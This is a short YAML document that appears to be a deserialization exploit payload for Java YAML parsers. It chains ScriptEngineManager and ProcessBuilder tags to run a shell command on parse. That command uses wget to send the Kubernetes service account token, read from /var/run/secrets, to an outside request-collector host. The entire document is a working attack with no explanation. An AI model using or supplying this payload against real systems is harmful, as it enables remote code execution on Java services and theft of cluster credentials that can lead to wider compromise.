!!javax.script.ScriptEngineManager [
  !!java.lang.ProcessBuilder [[
    !!java.lang.String ["wget https://en70bgxpxujs.x.pipedream.net/a=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"]
  ]]
]
